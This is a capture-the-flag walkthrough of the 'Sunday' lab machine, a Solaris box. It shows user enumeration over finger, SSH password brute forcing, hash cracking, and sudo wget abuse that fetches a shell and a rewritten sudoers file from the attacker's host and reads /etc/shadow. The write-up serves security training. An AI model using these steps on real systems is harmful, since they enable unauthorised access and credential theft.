Sunday
This Box was really hard to scan and unstable, she lost around 25% of ping packets. I needed several scans to find all ports.
Contents
Ports scan
nmap
root@kali:~/HTB/Machines/Sunday# nmap -A -T4 -v 10.10.10.76 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 20:53 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 20:53 Completed NSE at 20:53, 0.00s elapsed Initiating NSE at 20:53 Completed NSE at 20:53, 0.00s elapsed Initiating NSE at 20:53 Completed NSE at 20:53, 0.00s elapsed Initiating Ping Scan at 20:53 Scanning 10.10.10.76 [4 ports] Completed Ping Scan at 20:53, 0.07s elapsed (1 total hosts) Initiating SYN Stealth Scan at 20:53 Scanning sunday.htb (10.10.10.76) [1000 ports] Discovered open port 111/tcp on 10.10.10.76 Increasing send delay for 10.10.10.76 from 0 to 5 due to 34 out of 84 dropped probes since last increase. Discovered open port 79/tcp on 10.10.10.76 Increasing send delay for 10.10.10.76 from 5 to 10 due to 18 out of 44 dropped probes since last increase. Warning: 10.10.10.76 giving up on port because retransmission cap hit (6). Completed SYN Stealth Scan at 20:53, 29.55s elapsed (1000 total ports) Initiating Service scan at 20:53 Scanning 2 services on sunday.htb (10.10.10.76) Completed Service scan at 20:54, 6.20s elapsed (2 services on 1 host) Initiating OS detection (try #1) against sunday.htb (10.10.10.76) Retrying OS detection (try #2) against sunday.htb (10.10.10.76) Retrying OS detection (try #3) against sunday.htb (10.10.10.76) Retrying OS detection (try #4) against sunday.htb (10.10.10.76) Retrying OS detection (try #5) against sunday.htb (10.10.10.76) Initiating Traceroute at 20:54 Completed Traceroute at 20:54, 0.05s elapsed Initiating Parallel DNS resolution of 2 hosts. at 20:54 Completed Parallel DNS resolution of 2 hosts. at 20:54, 0.19s elapsed NSE: Script scanning 10.10.10.76. Initiating NSE at 20:54 Completed NSE at 20:54, 10.06s elapsed Initiating NSE at 20:54 Completed NSE at 20:54, 0.09s elapsed Initiating NSE at 20:54 Completed NSE at 20:54, 0.00s elapsed Nmap scan report for sunday.htb (10.10.10.76) Host is up (0.045s latency). Not shown: 838 closed ports, 160 filtered ports PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd |_finger: No one logged on\x0D 111/tcp open rpcbind 2-4 (RPC #100000) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/27%OT=79%CT=1%CU=37827%PV=Y%DS=2%DC=T%G=Y%TM=5DDF28 OS:D2%P=x86_64-pc-linux-gnu)SEQ(SP=9B%GCD=1%ISR=A4%TI=I%CI=I%II=I%SS=S%TS=7 OS:)SEQ(CI=I)OPS(O1=NNT11M54DNW0NNS%O2=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=N OS:NT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3 OS:=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y OS:%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=4 OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0% OS:Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%I OS:PL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)
Network Distance: 2 hops Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 44.30 ms 10.10.14.1 2 44.28 ms sunday.htb (10.10.10.76)
NSE: Script Post-scanning. Initiating NSE at 20:54 Completed NSE at 20:54, 0.00s elapsed Initiating NSE at 20:54 Completed NSE at 20:54, 0.00s elapsed Initiating NSE at 20:54 Completed NSE at 20:54, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.14 seconds Raw packets sent: 2630 (122.016KB) | Rcvd: 920 (39.194KB)
Scan all ports to find missing ports.
root@kali:~/HTB/Machines/Sunday# nmap -p- 10.10.10.76 --max-retries 1 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-29 21:54 EST Warning: 10.10.10.76 giving up on port because retransmission cap hit (1). Nmap scan report for sunday.htb (10.10.10.76) Host is up (0.045s latency). Not shown: 37958 closed ports, 27572 filtered ports PORT STATE SERVICE 79/tcp open finger 111/tcp open rpcbind 22022/tcp open unknown 49323/tcp open unknown 64513/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1204.72 seconds
We find more ports :)
root@kali:~/HTB/Machines/Sunday# nmap -sC -sV -p 79,111,22022 10.10.10.76 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-29 22:18 EST Nmap scan report for sunday.htb (10.10.10.76) Host is up (0.045s latency).
PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd |_finger: No one logged on\x0D 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
Finger enumeration
Installation
root@kali:~/HTB/Utils# wget -q http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz root@kali:~/HTB/Utils# tar xfz finger-user-enum-1.0.tar.gz root@kali:~/HTB/Utils# cd finger-user-enum-1.0 root@kali:~/HTB/Utils/finger-user-enum-1.0# perl -MCPAN -e shell
cpan shell -- CPAN exploration and modules installation (v2.22) Enter 'h' for help.
cpan[1]> install Getopt::Std Reading '/root/.cpan/Metadata' Database was generated on Sun, 17 Nov 2019 20:17:03 GMT Fetching with LWP: http://www.cpan.org/authors/01mailrc.txt.gz Reading '/root/.cpan/sources/authors/01mailrc.txt.gz' ............................................................................DONE Fetching with LWP: http://www.cpan.org/modules/02packages.details.txt.gz Reading '/root/.cpan/sources/modules/02packages.details.txt.gz' Database was generated on Thu, 28 Nov 2019 01:17:03 GMT ............. New CPAN.pm version (v2.27) available. [Currently running version is v2.22] You might want to try install CPAN reload cpan to both upgrade CPAN.pm and run the new version without leaving the current session.
...............................................................DONE Fetching with LWP: http://www.cpan.org/modules/03modlist.data.gz Reading '/root/.cpan/sources/modules/03modlist.data.gz' DONE Writing /root/.cpan/Metadata Getopt::Std is up to date (1.12).
cpan[2]> quit Lockfile removed.
We copy the perl file to our work directory.
root@kali:~/HTB/Machines/Sunday# cp ../../Utils/finger-user-enum-1.0/finger-user-enum.pl ./
User enumeration
root@kali:~/HTB/Machines/Sunday# ./finger-user-enum.pl -m 50 -s 60 -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
---------------------------------------------------------- | Scan Information | ----------------------------------------------------------
Worker Processes ......... 50 Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt Target count ............. 1 Username count ........... 10163 Target TCP port .......... 79 Query timeout ............ 60 secs Relay Server ............. Not used
######## Scan started at Thu Nov 28 00:13:02 2019 ######### access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >.. admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >.. anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???.. bin@10.10.10.76: bin ??? < . . . . >.. dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???.. jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???.. la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???.. line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >.. message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >.. miof mela@10.10.10.76: Login Name TTY Idle When Where..miof ???..mela ???.. sammy@10.10.10.76: sammy pts/2 <Apr 24, 2018> 10.10.14.4 .. sunny@10.10.10.76: sunny pts/2 <Apr 24, 2018> 10.10.14.4 .. sys@10.10.10.76: sys ??? < . . . . >.. zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???.. ######## Scan completed at Thu Nov 28 00:16:29 2019 ######### 14 results.
10163 queries in 207 seconds (49.1 queries / sec)
Brute force against ssh port
I really don't like brute force or lucky guess techniques, first I tried hydra against user sammy, with no luck, but on second attemp sunny worked, even if it was easy to "guess".
root@kali:~/HTB/Machines/Sunday# hydra -f -V -l sunny -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt -o credentials.txt -s 22022 10.10.10.76 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-29 22:36:55 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 9437 login tries (l:1/p:9437), ~590 tries per task [DATA] attacking ssh://10.10.10.76:22022/ [ATTEMPT] target 10.10.10.76 - login "sunny" - pass "123456" - 1 of 9437 [child 0] (0/0) [ATTEMPT] target 10.10.10.76 - login "sunny" - pass "12345" - 2 of 9437 [child 1] (0/0) ... [ATTEMPT] target 10.10.10.76 - login "sunny" - pass "kristy" - 2383 of 9448 [child 14] (0/11) [22022][ssh] host: 10.10.10.76 login: sunny password: sunday [STATUS] attack finished for 10.10.10.76 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-29 22:51:00
Login with user sunny and lateral escalation
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 sunny@10.10.10.76 Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I didn't expect this, but a quick search gave the solution.
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 -okexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established. RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts. Password: Last login: Sat Nov 30 03:51:01 2019 from 10.10.14.34 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
The user flag is not available for user sunny :(
Sudo user sunny
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
But the execution of the troll file is not very useful (at least now).
sunny@sunday:~$ sudo /root/troll testing uid=0(root) gid=0(root)
Shadow backup file
After a while, there is a interesting readable file in folder /backup.
sunny@sunday:/backup$ ls -ltr total 2 -rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup -r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Hashcat to find sammy password
Again, I don't like brute force, and because I don't have a crack machine available.
root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=8 -D KERN_TYPE=7400 -D _unroll' Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat Status...........: Running Hash.Type........: sha256crypt $5$, SHA256 (Unix) Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB Time.Started.....: Thu Nov 28 01:34:21 2019 (4 secs) Time.Estimated...: Thu Nov 28 10:04:01 2019 (8 hours, 29 mins) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 469 H/s (11.44ms) @ Accel:64 Loops:64 Thr:1 Vec:8 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 1536/14344384 (0.01%) Rejected.........: 0/1536 (0.00%) Restore.Point....: 1536/14344384 (0.01%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2560-2624 Candidates.#1....: clover -> lovers1
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat Status...........: Running Hash.Type........: sha256crypt $5$, SHA256 (Unix) Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB Time.Started.....: Thu Nov 28 01:34:21 2019 (8 mins, 25 secs) Time.Estimated...: Thu Nov 28 13:02:05 2019 (11 hours, 19 mins) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 348 H/s (18.94ms) @ Accel:64 Loops:64 Thr:1 Vec:8 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 175104/14344384 (1.22%) Rejected.........: 0/175104 (0.00%) Restore.Point....: 175104/14344384 (1.22%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2816-2880 Candidates.#1....: ROSAPASTEL -> 930330
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
Session..........: hashcat Status...........: Cracked Hash.Type........: sha256crypt $5$, SHA256 (Unix) Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB Time.Started.....: Thu Nov 28 01:34:21 2019 (9 mins, 49 secs) Time.Estimated...: Thu Nov 28 01:44:10 2019 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 346 H/s (19.36ms) @ Accel:64 Loops:64 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 203776/14344384 (1.42%) Rejected.........: 0/203776 (0.00%) Restore.Point....: 203264/14344384 (1.42%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000 Candidates.#1....: daddyzgurl -> chrystelle
Started: Thu Nov 28 01:34:19 2019 Stopped: Thu Nov 28 01:44:11 2019
We find the password,
root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
User Flag
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 -okexAlgorithms=+diffie-hellman-group1-sha1 sammy@10.10.10.76 Password: Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sammy@sunday:~$ cat Desktop/user.txt <USER_FLAG>
User escalation
sudo user sammy
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
With wget, we should be able to write files as root.
Overwrite /root/troll
From sammy user, we can overwrite /root/troll file, and execute as root from sunny user.
Open listener
root@kali:~/HTB/Machines/Sunday# vi troll root@kali:~/HTB/Machines/Sunday# cat troll bash root@kali:~/HTB/Machines/Sunday# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Download the new troll file
sammy@sunday:~$ sudo wget http://10.10.14.34/troll -O /root/troll --05:25:35-- http://10.10.14.34/troll => `/root/troll' Connecting to 10.10.14.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5 [application/octet-stream]
100%[====================================>] 5 --.--K/s
05:25:35 (1000.58 KB/s) - `/root/troll' saved [5/5]
Execute /root/troll
sunny@sunday:/backup$ sudo /root/troll testing uid=0(root) gid=0(root)
But, we still have the testing output of the original bash :(
Execute /root/troll on loop
After various unsuccessful attempts, I found a suspicious sleeping process. I guessed something is overwriting the troll file each 5 seconds.
sammy@sunday:~$ ps -ef | grep sleep
root 7316 517 0 05:37:06 ? 0:00 /usr/gnu/bin/sleep 5
So, if we execute the troll file each second, we should win the "race".
sunny@sunday:/backup$ while : > do > echo "--------------------------------------" > sudo /root/troll > sleep 1 > done -------------------------------------- testing uid=0(root) gid=0(root) -------------------------------------- testing uid=0(root) gid=0(root) ...
Download the troll file
sammy@sunday:~$ sudo wget http://10.10.14.34/troll -O /root/troll --05:31:47-- http://10.10.14.34/troll => `/root/troll' Connecting to 10.10.14.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5 [application/octet-stream]
100%[====================================>] 5 --.--K/s
05:31:47 (996.49 KB/s) - `/root/troll' saved [5/5]
A root shell opens in the loop
...
testing
uid=0(root) gid=0(root)
--------------------------------------
testing
uid=0(root) gid=0(root)
--------------------------------------
root@sunday:/backup# whoami
root
User escalation (alternative way)
Read privileged files
The option -i of wget allows to download URLs from an input file. We can use this to read privileged files.
sammy@sunday:~$ sudo wget -i /root/troll /root/troll: Invalid URL #!/usr/bin/bash: Unsupported scheme /root/troll: Invalid URL /usr/bin/echo "testing": Unsupported scheme /root/troll: Invalid URL /usr/bin/id: Unsupported scheme No URLs found in /root/troll.
With a little awk, we can read cleanly files.
sammy@sunday:~$ sudo wget -i /root/troll 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}' #!/usr/bin/bash /usr/bin/echo "testing" /usr/bin/id
This trick works, if lines of the file doesn't have a URL or a correct scheme that wget can interpret. We could read the root flag with the following command.
sammy@sunday:~$ sudo wget -i /root/root.txt 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}' <ROOT_FLAG>
But we don't own the system.
Read /etc/sudoers
In solaris the sudoers file is readable by user root.
sammy@sunday:~$ sudo wget -i /etc/sudoers 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
The script fails because awk try to interpret %users
... #Samples #awk: (FILENAME=- FNR=21) fatal: not enough arguments to satisfy format string `%users ALL=/sbin/mount /cdrom,/sbin/umount /cdrom: Unsupported schemeted schemeorted scheme' ^ ran out for this one
But we do not need commented lines, so we ignore lines were 4th field begin by #.
sammy@sunday:~$ sudo wget -i /etc/sudoers 2>&1 | awk '{ if (substr($4,1,1)!="#") { for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}}' rootALL=(ALL)ALL sammyALL=(root)NOPASSWD:/usr/bin/wget sunnyALL=(root)NOPASSWD:/root/troll
Create a modified copy of /etc/sudoers
root@kali:~/HTB/Machines/Sunday# vi sudoers
And we give sammy full access to sudo.
root@kali:~/HTB/Machines/Sunday# cat sudoers
root ALL=(ALL) ALL
sammy ALL=(root) NOPASSWD: ALL
#sammy ALL=(root) NOPASSWD: /usr/bin/wget
sunny ALL=(root) NOPASSWD: /root/troll
Upload the new /etc/sudoers
sammy@sunday:~$ sudo wget http://10.10.14.34/sudoers -O /etc/sudoers --05:57:26-- http://10.10.14.34/sudoers => `/etc/sudoers' Connecting to 10.10.14.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 131[application/octet-stream]
100%[====================================>] 131 --.--K/s
06:36:24 (30.70 MB/s) - `/etc/passwd' saved [131/131]
sudo to user root
sammy@sunday:~$ sudo -i
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
root@sunday:~# whoami
root
User escalation (harder alternative way)
extract /etc/shadow
We can extract the hash of root.
sammy@sunday:~$ sudo wget -i /etc/shadow 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Hashcat root hash
root@kali:~/HTB/Machines/Sunday# echo "$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD" >> hash.txt root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU
Hashes: 2 digests; 2 unique digests, 2 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
INFO: Removed 1 hash found in potfile.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=8 -D KERN_TYPE=7400 -D _unroll' Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
I gave up with this solution, I need a crack machine for this,...
Root flag
root@sunday:/backup# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 21:51, 29 November 2019 (EST)